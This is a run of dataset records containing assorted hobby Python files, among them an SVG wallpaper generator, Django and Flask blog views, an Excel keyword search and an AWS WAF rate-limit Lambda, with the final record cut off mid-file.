self.x_start=0\n self.y_start=0\n\n # extendWall(self)\n # Extends walls one block to the right\n def extendWall(self):\n if (self.DEBUG == 1):\n print(self.DEBUG_TAG + \":extendWall\")\n self.x_span+=1\n\n # updateStartPosition(self, x, y)\n # Updates the position where WallBuilder creates a new wall\n def updateStartPosition(self, x, y):\n if (self.DEBUG == 1): \n print(self.DEBUG_TAG + \":updateStartPosition:\" + str(x) + \":\" + str(y))\n self.x_start=x\n self.y_start=y\n\n # closeWall(self)\n # Closes the Wall and creates a Wall object\n def closeWall(self):\n if (self.DEBUG == 1):\n print(self.DEBUG_TAG + \":closeWall\")\n \n self.x_span+=1\n\n if (self.DEBUG == 1):\n print(self.DEBUG_TAG + \":closeWall:span:\" + str(self.x_span) + \":\" + str(self.y_span))\n print(self.DEBUG_TAG + \":closeWall:pos:\" + str(self.x_start) + \":\" + str(self.y_start))\n\n # Build Wall; value of y_span still needs to be used for vertical walls later\n new_wall=Wall(self.x_start*self.ppm.getX(), self.y_start*self.ppm.getY(), self.x_span*self.ppm.getX(), self.y_span*self.ppm.getY())\n self.wall_storage.append(new_wall)\n\n # Resets the WallBuilder\n self.resetBuilder()\n\n # wallCollection(self)\n # Returns all Wall objects\n def wallCollection(self):\n if (self.DEBUG == 1):\n print(self.DEBUG_TAG + \":wallCollection\")\n return self.wall_storage\n","sub_path":"Invaders/Code/WallBuilder.py","file_name":"WallBuilder.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"187814196","text":"#!/usr/bin/env python\nimport svgwrite\nimport random\nimport math\n\n\n# dummy vars for use in test\n\n# from user\nprimary = [0, 110, 170]\naccent1 = [255, 50, 0]\naccent2 = [255, 180, 0]\nbackground = [0, 
160, 255]\n# from system\nwidth = 800\nheight = 600\nlocation = r'C:\\Users\\Lauren\\Desktop\\test.svg'\n\n\n\nclass element:\n\n\tdef __init__ ( self ):\n\t\tpass\n\n\t@staticmethod\n\tdef selectColour(p, a1, a2):\n\t\t# Allows each element to be randomly assigned a colour, biased toward the primary colour\n\t\trand = random.random() # randomise colour\n\t\tif rand <= 0.5: # 50% primary colour\n\t\t\treturn p\n\t\telif rand <= 0.75: # 25% accent 1\n\t\t\treturn a1\n\t\telif rand <= 1: # 25% accent 2\n\t\t\treturn a2\n\n\n\nclass image:\n\n\tdef __init__ ( self, loc, h, w, p, a1, a2, b):\n\t\tself.dwg = svgwrite.Drawing( loc, size=( w, h ) )\n\t\tself.height = h\n\t\tself.width = w\n\t\tself.primary = p\n\t\tself.accent1 = a1\n\t\tself.accent2 = a2\n\t\tself.background = b\n\n\tdef createBackground ( self ):\n\t\t# create solid colour background\n\t\tbackground = self.dwg.add( self.dwg.rect( insert=( 0, 0 ), size=( self.width, self.height ) ) )\n\t\tbackground.fill( svgwrite.rgb( self.background[0],self.background[1],self.background[2] ), opacity=1 )\n\n\n\n\nimg = image( location, height, width, primary, accent1, accent2, background )\n\nimg.createBackground()\nimg.dwg.save()\n\n\n\n\n\n\n\n\n\n\n\ndef circles( self, dwg ):\n\n\t# define orbital spacing\n\torbits = 80 # number of orbits\n\tobitDistance = 40 # distance between each orbit\n\n\t# define angular spacing\n\tangleScaler = 2\n\n\t# define seed location\n\tseedWidth = width * 0.75 # can only appear inside centre 3/4\n\tseedHeight = height * 0.75\n\tminWidth = width * 0.125\n\tminHeight = height * 0.125\n\tseedX = minWidth + ( seedWidth * random.random() )\n\tseedY = minHeight + ( seedHeight * random.random() )\n\n\t# select imploding or exploding\n\tdirection = random.random()\n\n\tif direction >= 0.5:\n\t\t# exploding starts with large seed radius\n\t\tseedRadius = random.uniform( 50, 55 )\n\telse:\n\t\t# imploding starts with small seed radius\n\t\tseedRadius = random.uniform( 5, 10 )\n\n\n\t# loop through orbital rings\n\tfor orbit in range ( 1, orbits ):\n\n\t\tfor dot in range( 0, orbit * angleScaler ):\n\n\t\t\tif direction >= 0.5:\n\t\t\t\tseedRadius = seedRadius * random.uniform( 0.998, 0.999 ) # exploding gets smaller outwards\n\t\t\t\torbitRadius = obitDistance * orbit * random.uniform( 0.50, 0.80 ) # exploding has larger spacing between orbits\n\t\t\telse:\n\t\t\t\tseedRadius = seedRadius * random.uniform( 1.0, 1.0005 ) # imploding gets larger outwards\n\t\t\t\torbitRadius = obitDistance * orbit * random.uniform( 0.20, 0.50 )\t# imploding has smaller spacing between orbits\n\n\t\t\t# get random angle and x, y from seed location\n\t\t\tangle = random.uniform( 0, 360 )\n\t\t\tdotX = orbitRadius * math.cos( angle )\n\t\t\tdotY = orbitRadius * math.sin( angle )\n\t\t\t# add to seed location\n\t\t\tdotX = seedX + dotX\n\t\t\tdotY = seedY + dotY\n\n\t\t\t# create element\n\t\t\telement = dwg.add( dwg.circle( center = ( dotX, dotY ), \n\t\t\t\t\t\t\t\t\t\t   r = seedRadius * random.uniform( 0.8, 1 )))\n\t\t\t\n\t\t\telement.fill( svgwrite.rgb( *selectColour(primary, accent1, accent2) ), opacity=0.75 )\n\n\treturn dwg\n\n\n# horizontal / vertical stripes\ndef stripes(width, height, dwg):\n\n\t# define seed location\n\tleft = 0\n\tright = width\n\ttop = height\n\tbottom = 0\n\n\t# define stripe parameters\n\tthickness = random.uniform( 350, 450 )\n\tminThickness = 20\n\tminAngle = -15\n\tmaxAngle = 15\n\tspread = 300\n\tnumberStripes = 20\n\n\t# select horizontal or vertical\n\tdirection = random.random()\n\n\tfor stripe in range ( 1, 
numberStripes ):\n\n\t\t# set thickness of line\n\t\tthickness = thickness * random.uniform( 0.5, 0.999 )\n\n\t\t# restrict minimum thickness\n\t\tif thickness <= minThickness:\n\t\t\tthickness = minThickness*( 1 + random.random() )\n\n\t\t# set angle to skew line to\n\t\tangle = random.uniform( minAngle, maxAngle )\n\n\t\t# create either horizontal or vertical lines\n\t\tif direction >= 0.5:\n\t\t\t# vertical position of horizontal stripe stays within spread area\n\t\t\tvertPos = ( top / 2 ) - thickness + random.uniform( -spread, spread )\n\t\t\telement = dwg.add( dwg.rect( insert=( left, vertPos ), \n\t\t\t\t\t\t\t\t\t\t size=( right, thickness ) ) )\n\t\t\t# skew to predefined angle\n\t\t\telement.skewY( angle )\n\t\telse:\n\t\t\t# horizontal position of vertical stripe stays within spread area\n\t\t\thoriPos = ( right / 2 ) - thickness + random.uniform( -spread, spread )\n\t\t\telement = dwg.add(dwg.rect( insert=( horiPos, bottom ), \n\t\t\t\t\t\t\t\t\t\tsize=( thickness, top ) ) )\n\t\t\t# skew to predefined angle\n\t\t\telement.skewX( angle )\n\n\t\telement.fill( svgwrite.rgb( *selectColour(primary, accent1, accent2) ), opacity=0.75 )\n\n\treturn dwg\n\n\ndef selectColour(p, a1, a2):\n\t# Allows each element to be randomly assigned a colour, biased toward the primary colour\n\trand = random.random()\t\t# randomise colour\n\tif rand <= 0.5:\t\t\t\t# 50% primary colour\n\t\treturn p\n\telif rand <= 0.75:\t\t\t# 25% accent 1\n\t\treturn a1\n\telif rand <= 1:\t\t\t\t# 25% accent 2\n\t\treturn a2\n\n","sub_path":"wallpaperGenerator/style.py","file_name":"style.py","file_ext":"py","file_size_in_byte":4830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"}
{"seq_id":"82846518","text":"class Misc:\n\n    BLANK = \"\"\n\n    def __init__(self):\n        pass\n\n\n    @staticmethod\n    def apply_if_not_present( df, cls, to_delete ):\n        try:\n            idx = df.columns.get_loc( cls.describe() )\n        except:\n            print( \"Could not find \" + str( cls.describe() ))\n            df = cls.apply(df)\n            to_delete.append( cls.describe() )\n        return [ df, to_delete ]\n\n    @staticmethod\n    def roc_pct(row, horizon, feature ):\n        change = row[ feature ] - row[ feature + \"_T-\" + str( horizon ) ]\n        change_pct = change/row[feature + \"_T-\" + str( horizon )]\n        return change_pct\n\n    @staticmethod\n    def change(row, horizon, feature):\n        chg = row[feature] - row[feature + \"_T-\" + str(horizon)]\n        return chg\n\n    @staticmethod\n    def rsi( row, rma_adv, rma_dec, sum_n_adv, sum_n_dec ):\n        sum_n_adv_v = abs(row[sum_n_adv ])\n        sum_n_dec_v = abs(row[sum_n_dec])\n\n        rma_adv_v = abs( row[rma_adv])\n        rma_dec_v = abs( row[rma_dec])\n\n        mean_adv_v = rma_adv_v\n        mean_dec_v = rma_dec_v\n\n        if mean_dec_v == 0:\n            ratio = 0\n        else:\n            ratio = 100/(1+(mean_adv_v/mean_dec_v))\n\n        r = 100 - ratio\n\n        return r","sub_path":"MCMC/Misc.py","file_name":"Misc.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"}
{"seq_id":"585748014","text":"#!/usr/bin/env python3\n# Author: Tyson Andre\nimport re\nimport sys\n\n# assumes file names don't have spaces.\n# Could rewrite all of this to use JSON.\nREDEFINE_REGEX=re.compile(r'^\\S+:\\d+ PhanRedefine\\w+ .*defined at (\\S*):\\d+.*at (\\S+):\\d+$')\nassert(REDEFINE_REGEX.match(r'aaXX/fy.php:571 PhanRedefineFunction Function error defined at aaXX/fy.php:571 was previously defined at blah/law.inc:193'))\n\ndef compare_files(a, b):\n    '''Can be customized. 
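By default the lexicographically smaller path is kept. 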
If this returns true, a is preferred to be kept over b'''\n    return a < b\n\ndef get_redefine_pairs(filename):\n    fin = open(filename, 'r')\n    for line in fin:\n        if ' PhanRedefine' in line:\n            match = REDEFINE_REGEX.match(line)\n            if match is not None:\n                original = match.group(1)\n                other = match.group(2)\n                yield original, other, line\n\n\ndef main():\n    if len(sys.argv) != 2:\n        print(\"Usage: {} phan_results.txt\".format(sys.argv[0]))\n        print(\"  This script parses Phan analysis results and spits out a list of exclusions for duplicate class/function entries\")\n        sys.exit(1)\n    filename = sys.argv[1]\n    sys.stderr.write(\"Choosing files to exclude in '{}'\\n\".format(filename))\n    excluded_files = set()\n    for original, other, line in get_redefine_pairs(filename):\n        if original in excluded_files:\n            continue\n        if other in excluded_files:\n            continue\n        excluded_files.add(other if compare_files(original, other) else original)\n\n    print(\"    'exclude_file_list' => [\")\n    if len(excluded_files) > 0:\n        print('        // These files were excluded because they duplicated class or method definitions')\n        for excluded_filename in sorted(excluded_files):\n            print('        ' + repr(excluded_filename) + ',')\n    print(\"    ],\")\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"contrib/redefines.py","file_name":"redefines.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"}
{"seq_id":"308331371","text":"from django.views import generic as generic_views\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.views.decorators.cache import never_cache\nfrom PIL import Image\nfrom django.conf import settings\nimport shutil\n\nfrom Muhovic.frontend.models import Type, Artwork\n\n\nclass ManagerView(generic_views.TemplateView):\n    template_name = 'manager/manage.html'\n\n    @never_cache\n    def get(self, request, *args, **kwargs):\n        return super(ManagerView, self).get(request, *args, **kwargs)\n\n    def post(self, request, *args, **kwargs):\n        if request.POST.get('action') == 'delete':\n            for id in request.POST.getlist('img_id'):\n                Artwork.objects.get(id=id).delete()\n        elif request.POST.get('action') == 'add':\n            image_upload(request)\n        return super(ManagerView, self).get(request, *args, **kwargs)\n\n    def get_context_data(self, **kwargs):\n        context = dict()\n        c = Type.objects.all()\n        categories = []\n        for cat in c:\n            images = Artwork.objects.filter(category=cat)\n            ls = []\n            for img in images:\n                ls.append([img.thumb(), img.id])\n            categories.append([[cat, cat.id], ls])\n        context['categories'] = categories\n        return context\n\n\ndef imagesTab(request):\n    return render_to_response('manager/images.html', locals(),\n                              context_instance=RequestContext(request))\n\n\ndef image_upload(request):\n    cat = Type.objects.get(id=request.POST['category'])\n    for image in request.FILES.getlist('images[]'):\n        a = Artwork()\n        a.filename = cat.apiAlias + '/' + str(image)\n        a.title = 'Brez naslova'\n        a.title_en = 'Untitled'\n        a.category = cat\n        handle_uploaded_file(image, cat.apiAlias)\n        a.save()\n    return True\n\n\ndef handle_uploaded_file(f, subdir):\n    size = 128, 128\n    import os\n\n    name = str(f)\n    p = settings.STATICFILES_DIRS[0]\n    with open(p + 'images/content/gallery/' + subdir + '/' + str(f), 'wb+') as destination:\n        for chunk in f.chunks():\n            destination.write(chunk)\n        destination.close()\n\n    # make thumbnail\n    im = Image.open(p + 'images/content/gallery/' + subdir + '/' + name)\n    name, ext = os.path.splitext(name)\n    
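# (editorial note) PIL's Image.thumbnail() resizes the image in place, preserving the\n    # aspect ratio so the result fits within the 128x128 'size' bound defined above\n    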
im.thumbnail(size, Image.ANTIALIAS)\n ime = name + \"-thumb.jpg\"\n im.save(ime, \"JPEG\")\n if not (os.path.isdir(p + 'images/content/gallery/' + subdir + '/thumbs')):\n os.makedirs(p + 'images/content/gallery/' + subdir + '/thumbs')\n shutil.move(ime, p + 'images/content/gallery/' + subdir + '/thumbs')\n","sub_path":"Muhovic/manager/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"566179429","text":"import boto3\nimport os\nimport glob\nimport logging\nimport time\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n\nclass WafRateLimit:\n\n def __init__(self, resource_properties):\n self.rate = resource_properties['Rate']\n self.action = resource_properties['Action']\n self.region = resource_properties['Region']\n self.ip_set = resource_properties['IPSet']\n self.negated = resource_properties['Negated']\n self.region = resource_properties['Region']\n self.regional = resource_properties.get('Regional', 'false')\n self.web_acl_id = resource_properties['WebACLId']\n self.priority = int(resource_properties['Priority'])\n\n if 'EnvironmentName' in resource_properties:\n self.rule_name = f\"{resource_properties['EnvironmentName']}-rate-limit\"\n self.ip_set_name = f\"{resource_properties['EnvironmentName']}-rate-limit-ip-set\"\n else:\n self.rule_name = resource_properties['RuleName']\n self.ip_set_name = resource_properties['IpSetName']\n\n self.metric_name = self.rule_name.replace('-', '')\n\n if to_bool(self.regional):\n self.client = boto3.client('waf-regional', region_name=self.region)\n else:\n self.client = boto3.client('waf', region_name=self.region)\n\n def retry(func):\n # Reattempt to execute a given function with optional arguments.\n # This is to avoid the insane error about a token already being expired.\n def wrapper(self, *args, **kwargs):\n attempts = 5\n remaining = attempts\n\n while remaining:\n try:\n result = func(self, *args, **kwargs)\n return result\n except self.client.exceptions.WAFStaleDataException as e:\n logger.info(str(e))\n time.sleep(1)\n logger.info(\"(%d/%d) Retrying request with a new change token...\" % (remaining + 1, attempts))\n remaining -= 1\n\n logger.info(\"ERROR - failed to execute request.\")\n exit(1)\n\n return wrapper\n\n def _create_rate_based_rule(self):\n rule_id = self.create_rate_based_rule()\n\n if len(self.ip_set):\n ip_set_id = self.create_ip_set()\n self.update_ip_set('INSERT', ip_set_id, self.ip_set)\n self.update_rate_based_rule('INSERT', ip_set_id, rule_id)\n\n self._add_to_web_acl(rule_id)\n\n return rule_id\n\n @retry\n def create_rate_based_rule(self):\n change_token = self._get_change_token()\n logger.info(\"Creating WAF rule '%s' ...\" % self.rule_name)\n\n rule_id = self.client.create_rate_based_rule(\n Name=self.rule_name,\n MetricName=self.metric_name,\n RateLimit=int(self.rate),\n RateKey='IP',\n ChangeToken=change_token\n )['Rule']['RuleId']\n\n return rule_id\n\n @retry\n def create_ip_set(self):\n change_token = self._get_change_token()\n logger.info(\"Creating IP set '%s' ...\" % self.ip_set_name)\n\n ip_set_id = self.client.create_ip_set(\n Name=self.ip_set_name,\n ChangeToken=change_token\n )['IPSet']['IPSetId']\n\n return ip_set_id\n\n @retry\n def update_ip_set(self, action, ip_set_id, ip_set):\n change_token = self._get_change_token()\n logger.info(\"Updating IP set '%s' (%s) with %d IPs as %s ...\" % (self.ip_set_name, ip_set_id, len(self.ip_set), action))\n\n 
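# (editorial note) the classic WAF API expresses IP set changes as a batch of INSERT/DELETE\n        # updates, serialized by the change token fetched in _get_change_token() above\n        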
self.client.update_ip_set(\n IPSetId=ip_set_id,\n ChangeToken=change_token,\n Updates=generate_waf_ip_set(action, ip_set)\n )\n\n def _update_rate_based_rule(self, rule_id):\n self._delete_rate_based_rule(rule_id)\n return self._create_rate_based_rule()\n\n @retry\n def update_rate_based_rule(self, action, ip_set_id, rule_id):\n change_token = self._get_change_token()\n logger.info(\"Updating rule '%s' (%s) with IP set '%s' (%s) as %s ...\" % (self.rule_name, rule_id, self.ip_set_name, ip_set_id, action))\n\n self.client.update_rate_based_rule(\n RuleId=rule_id,\n ChangeToken=change_token,\n Updates=[{\n 'Action': action,\n 'Predicate': {\n 'Negated': to_bool(self.negated),\n 'Type': 'IPMatch',\n 'DataId': ip_set_id\n }\n }],\n RateLimit=int(self.rate)\n )\n\n def _delete_rate_based_rule(self, rule_id):\n logger.info(\"Getting IP set for rule '%s' (%s) ...\" % (self.rule_name, rule_id))\n\n try:\n predicates = self.client.get_rate_based_rule(\n RuleId=rule_id\n )['Rule']['MatchPredicates']\n except self.client.exceptions.WAFNonexistentItemException as e:\n logger.info(\"%s: rule ID '%s' does not exist. Returning success\" % (str(e), rule_id))\n return\n\n if len(predicates):\n ip_set_id = predicates[0]['DataId']\n\n logger.info(\"Getting IPs for IP set '%s' ...\" % (ip_set_id))\n\n current_ip_set = self.client.get_ip_set(\n IPSetId=ip_set_id\n )['IPSet']['IPSetDescriptors']\n\n if len(current_ip_set):\n self.update_ip_set('DELETE', ip_set_id, current_ip_set)\n\n self.update_rate_based_rule('DELETE', ip_set_id, rule_id)\n self.delete_ip_set(ip_set_id)\n\n self._delete_from_web_acl(rule_id)\n self.delete_rate_based_rule(rule_id)\n\n @retry\n def delete_ip_set(self, ip_set_id):\n change_token = self._get_change_token()\n logger.info(\"Deleting IP set '%s' ...\" % (ip_set_id))\n\n self.client.delete_ip_set(\n IPSetId=ip_set_id,\n ChangeToken=change_token\n )\n\n @retry\n def delete_rate_based_rule(self, rule_id):\n change_token = self._get_change_token()\n logger.info(\"Deleting rule '%s' (%s) ...\" % (self.rule_name, rule_id))\n\n self.client.delete_rate_based_rule(\n RuleId=rule_id,\n ChangeToken=change_token\n )\n\n def _get_change_token(self):\n token = self.client.get_change_token()['ChangeToken']\n logger.info(\"Got change token: %s\" % token)\n return token\n\n def _add_to_web_acl(self, rule_id):\n self._update_web_acl('INSERT', self.action, self.priority, rule_id)\n\n def _delete_from_web_acl(self, rule_id):\n # Get the current rule priority, as it is needed in the update request\n web_acl_rules = self.client.get_web_acl(\n WebACLId=self.web_acl_id\n )['WebACL']['Rules']\n\n current_rule = list(filter(lambda rule: rule['RuleId'] == rule_id, web_acl_rules))[0]\n current_action = current_rule['Action']['Type']\n current_priority = int(current_rule['Priority'])\n\n self._update_web_acl('DELETE', current_action, current_priority, rule_id)\n\n @retry\n def _update_web_acl(self, new_action, current_action, priority, rule_id):\n \"\"\"Add a rule ID with a web ACL.\n \"\"\"\n change_token = self._get_change_token()\n logger.info(\"%sing rule '%s' (%s) in web ACL ID '%s'\" % (new_action, self.rule_name, rule_id, self.web_acl_id))\n\n self.client.update_web_acl(\n WebACLId=self.web_acl_id,\n Updates=[{\n \"Action\": new_action,\n \"ActivatedRule\": {\n \"Action\": {\n \"Type\": current_action\n },\n \"Priority\": priority,\n \"RuleId\": rule_id,\n \"Type\": \"RATE_BASED\"\n }\n }],\n ChangeToken=change_token\n )\n\ndef generate_waf_ip_set(action, ips):\n return [{'Action': action, 
'IPSetDescriptor': ip } for ip in ips]\n\ndef to_bool(value):\n    return value.lower() == 'true'\n","sub_path":"lambdas/waf_rate_limit/logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":7908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"}
{"seq_id":"300264142","text":"## hks9999\n## Windows\n## python 3.6.3\n\nimport os\nimport sys\nimport hashlib\nimport xlrd\nimport csv\n\nkeyword = {\"test\",\"okok\"}\n\ndef run(abspath,absdir):\n    print(\"File :\",abspath)\n    print(\"dir :\",absdir)\n\n    wb = xlrd.open_workbook(abspath)\n    sh = wb.sheet_by_index(0)\n    your_csv_file = open('result.csv', 'a', encoding=\"utf-8\")\n    wr = csv.writer(your_csv_file, quoting=csv.QUOTE_ALL)\n\n    for rownum in range(sh.nrows):\n        # check whether the row contains any of the keywords\n        string = str(sh.row_values(rownum))\n        for key_word in keyword:\n            if(string.find(key_word) >= 0 ):\n                print(string)\n                wr.writerow(sh.row_values(rownum))\n                break # stop checking further keywords once one matches\n    your_csv_file.close()\n\ndef filefind(dest):\n    for root, dirs, files in os.walk(dest):\n        for filename in files:\n            relativepath = os.path.join(root,filename)\n            abspath = os.path.abspath(relativepath)\n            name,ext = os.path.splitext(filename)\n            run(abspath,os.path.dirname(abspath))\n            print()\n\nif __name__ == \"__main__\" :\n    if(len(sys.argv)) != 2 :\n        print(sys.argv[0],'\"<file or directory>\"')\n        exit(0)\n    if(os.path.isfile(sys.argv[1]) == True ):\n        run(sys.argv[1], os.path.dirname(os.path.abspath(sys.argv[1])))\n    else:\n        filefind(sys.argv[1])\n","sub_path":"xls_search.py","file_name":"xls_search.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"}
{"seq_id":"305272994","text":"import sys\n\ninput_file = open(\"max_path_sum3.data\", \"r\")\ntree=[]\nnum_levels = 0\nfor line in input_file:\n\tline = line.strip()\n\tnums_str = line.split(' ')\n\tfor num_str in nums_str:\n\t\ttree.append(int(num_str))\n\tnum_levels = num_levels + 1\n\ntree_sum = []\ntree_sum.extend(tree)\nprint(tree_sum)\n\nprint(\"levels = \", num_levels)\nnum_nodes = 0\n\nfor level in range(1, num_levels + 1):\n\tif level == 1:\n\t\tnum_nodes = num_nodes + level\n\t\tcontinue\n\tparent = num_nodes - (level-1)\n\ttwo_node_count = 0\n\ti = num_nodes\n\twhile i < num_nodes + level:\n\t\tnode_sum = tree[i] + tree_sum[parent]\n\t\t#print(\"node_sum = \", node_sum, \"i = \", i, \"parent =\", parent)\n\t\tif node_sum > tree_sum[i]:\n\t\t\ttree_sum[i] = node_sum\n\t\ttwo_node_count = two_node_count + 1\n\t\tif two_node_count == 2 and i < (num_nodes + level -1):\n\t\t\tparent = parent + 1\n\t\t\ti = i - 1\n\t\t\ttwo_node_count = 0\n\t\ti = i + 1\n\tnum_nodes = num_nodes + level\n\t\t\nprint(tree_sum)\nprint(\"Max is \", max(tree_sum))\n","sub_path":"max_path_sum1.py","file_name":"max_path_sum1.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"}
{"seq_id":"75701082","text":"import os\nimport secrets\nfrom datetime import datetime\nfrom PIL import Image\nfrom flask import render_template, url_for, flash, redirect, request, abort\nfrom flaskblog import app, db, bcrypt\nfrom flaskblog.forms import RegistrationForm, LoginForm, UpdateAccountForm, PostForm\nfrom flaskblog.models import User, Post\nfrom flask_login import login_user, current_user, logout_user, login_required\n\n\n@app.route(\"/\")\n@app.route(\"/home\")\ndef home():\n    page = request.args.get('page', 1, type=int)\n    posts = Post.query.order_by(Post.date_posted.desc()).paginate(page=page, per_page=5)\n    return 
render_template('home.html', posts=posts)\n\n\n@app.route(\"/about\")\ndef about():\n return render_template('about.html', title='About')\n\n\n@app.route(\"/register\", methods=['GET', 'POST'])\ndef register():\n if current_user.is_authenticated:\n return redirect(url_for('home'))\n form = RegistrationForm()\n if form.validate_on_submit():\n hashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8')\n user = User(username=form.username.data, email=form.email.data, password=hashed_password,feed_period=form.feed_period.data,feed_amount=form.feed_amount.data)\n db.session.add(user)\n db.session.commit()\n flash('Your account has been created! You are now able to log in', 'success')\n return redirect(url_for('login')) #change it back to login\n elif request.method == 'GET':\n form.feed_amount.data = 25\n form.feed_period.data = 6\n return render_template('register.html', title='Register', form=form)\n\n\n@app.route(\"/login\", methods=['GET', 'POST'])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for('home'))\n form = LoginForm()\n if form.validate_on_submit():\n user = User.query.filter_by(email=form.email.data).first()\n if user and bcrypt.check_password_hash(user.password, form.password.data):\n login_user(user, remember=form.remember.data)\n next_page = request.args.get('next')\n return redirect(next_page) if next_page else redirect(url_for('home'))\n else:\n flash('Login Unsuccessful. Please check email and password', 'danger')\n return render_template('login.html', title='Login', form=form)\n\n\n@app.route(\"/logout\")\ndef logout():\n logout_user()\n return redirect(url_for('home'))\n\n\ndef save_picture(form_picture):\n random_hex = secrets.token_hex(8)\n _, f_ext = os.path.splitext(form_picture.filename)\n picture_fn = random_hex + f_ext\n picture_path = os.path.join(app.root_path, 'static/profile_pics', picture_fn)\n\n output_size = (125, 125)\n i = Image.open(form_picture)\n i.thumbnail(output_size)\n i.save(picture_path)\n\n return picture_fn\n \n#takes picture and username and creates a default user\n#Input pictur should be opened using Image.open() from PIL Image\ndef default_profile(picture,username):\n # piccc=save_picture(picture)\n random_hex = secrets.token_hex(8)\n _, f_ext = os.path.splitext(picture.filename)\n picture_fn = random_hex + f_ext\n picture_path = os.path.join(app.root_path, 'static/profile_pics', picture_fn)\n output_size = (125, 125)\n picture.thumbnail(output_size)\n picture.save(picture_path)\n\n mail = username + '@demo.com'\n password='deneme'\n hashed_password = bcrypt.generate_password_hash(password).decode('utf-8')\n user=User(username=username,email=mail,password=hashed_password,image_file=picture_fn)\n db.session.add(user)\n db.session.commit()\n\n# Create feeding log for given cat\ndef postt(username):\n user=User.query.filter_by(username=username).first()\n content= str(user.feed_amount) + ' g of food given '\n title= user.username + \"'s feeding log\"\n post=Post(title=title,content=content,user_id=user.id)\n db.session.add(post)\n db.session.commit()\n \ndef is_feed_time(username):\n user=User.query.filter_by(username=username).first()\n\n p=Post.query.order_by(Post.date_posted.desc()).filter_by(user_id=user.id).first() \n z=p.date_posted\n a=datetime.utcnow()\n c=(a.month-z.month)*24*30+(a.day-z.day)*24+a.hour-z.hour #Will return total hour difference\n return c>user.feed_period \n\n \n@app.route(\"/account\", methods=['GET', 'POST'])\n@login_required\ndef account():\n form = 
UpdateAccountForm()\n    if form.validate_on_submit():\n        if form.picture.data:\n            picture_file = save_picture(form.picture.data)\n            current_user.image_file = picture_file\n        current_user.username = form.username.data\n        current_user.email = form.email.data\n        current_user.feed_amount = form.feed_amount.data\n        current_user.feed_period = form.feed_period.data\n        db.session.commit()\n        flash('Your account has been updated!', 'success')\n        return redirect(url_for('account'))\n    elif request.method == 'GET':\n        form.username.data = current_user.username\n        form.email.data = current_user.email\n        form.feed_amount.data = current_user.feed_amount\n        form.feed_period.data = current_user.feed_period\n    image_file = url_for('static', filename='profile_pics/' + current_user.image_file)\n    return render_template('account.html', title='Account',\n                           image_file=image_file, form=form)\n\n\n@app.route(\"/post/new\", methods=['GET', 'POST'])\n@login_required\ndef new_post():\n    form = PostForm()\n    if form.validate_on_submit():\n        post = Post(title=form.title.data, content=form.content.data, author=current_user)\n        db.session.add(post)\n        db.session.commit()\n        flash('Your post has been created!', 'success')\n        return redirect(url_for('home'))\n# reuse this part when creating the post-creation functions\n    elif request.method == 'GET':\n        form.title.data = 'cat number' + str(current_user.id) + ' Feeding Log'\n        form.content.data = str(current_user.feed_amount)+' g of food given'\n    return render_template('create_post.html', title='New Post',\n                           form=form, legend='New Post')\n\n\n@app.route(\"/post/<int:post_id>\")\ndef post(post_id):\n    post = Post.query.get_or_404(post_id)\n    return render_template('post.html', title=post.title, post=post)\n\n\n@app.route(\"/post/<int:post_id>/update\", methods=['GET', 'POST'])\n@login_required\ndef update_post(post_id):\n    post = Post.query.get_or_404(post_id)\n    if post.author != current_user:\n        abort(403)\n    form = PostForm()\n    if form.validate_on_submit():\n        post.title = form.title.data\n        post.content = form.content.data\n        db.session.commit()\n        flash('Your post has been updated!', 'success')\n        return redirect(url_for('post', post_id=post.id))\n    elif request.method == 'GET':\n        form.title.data = post.title\n        form.content.data = post.content\n    return render_template('create_post.html', title='Update Post',\n                           form=form, legend='Update Post')\n\n\n@app.route(\"/post/<int:post_id>/delete\", methods=['POST'])\n@login_required\ndef delete_post(post_id):\n    post = Post.query.get_or_404(post_id)\n    if post.author != current_user:\n        abort(403)\n    db.session.delete(post)\n    db.session.commit()\n    flash('Your post has been deleted!', 'success')\n    return redirect(url_for('home'))\n\n\n@app.route(\"/user/<string:username>\")\ndef user_posts(username):\n    page = request.args.get('page', 1, type=int)\n    user = User.query.filter_by(username=username).first_or_404()\n    posts = Post.query.filter_by(author=user)\\\n        .order_by(Post.date_posted.desc())\\\n        .paginate(page=page, per_page=5)\n    return render_template('user_posts.html', posts=posts, user=user)\n","sub_path":"flask_blog/flaskblog/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":7668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"}
{"seq_id":"173222480","text":"import requests\nimport re\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nimport datetime\nimport csv\nimport boto3\n\nTHIS_YEAR = datetime.date.today().year\nSTART_MONTH = 3\nEND_MONTH = 10\n\nBUCKET_NAME = 
